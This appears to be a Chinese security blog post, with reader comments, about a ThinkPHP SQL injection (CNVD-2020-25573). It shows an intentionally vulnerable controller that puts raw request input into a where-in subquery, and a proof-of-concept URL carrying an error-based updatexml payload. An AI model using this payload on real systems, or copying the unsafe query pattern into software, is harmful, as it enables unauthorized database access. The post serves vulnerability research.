ThinkPHP存在SQL注入漏洞（CNVD-2020-25573）

lufei · 2020 年5 月 23 日 12:24

前言

这个洞很简单，其实就是找场景，没做过多的分析。

public function index()
    {
        $result = db('users')->where('id','in',function ($query) {
            $query->field('1')->where('id', 'in', request()->get('username/s'));
        })->select();
        print_r($result);
        return '';
    }

url

http://127.0.0.1/tpsafe/public/index.php?username=1,2,3 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

如图会造成注入

更新

Incorrect table name，因为是github的修复方式把connection置空了。

Joseph · 2020 年5 月 24 日 02:41

这个我觉得不算漏洞吧！Cnvd果然太多提交都太水了

lufei · 2020 年5 月 24 日 03:13

嗯，cnvd危害等级还给了高

Joseph · 2020 年5 月 24 日 03:43

之前看见提交，这以为某司想不通发0day了

243536998 · 2020 年5 月 24 日 06:47

师傅，这是tp5.0全版本嘛，我按照你写的构造index()，提示 Incorrect table name ''，我加上->table('users')又正常查询。。。

savior_pk · 2020 年5 月 25 日 05:56

毕竟还多学生要刷证书

lufei · 2020 年5 月 25 日 13:57

Incorrect table name，因为是github的修复方式把connection置空了。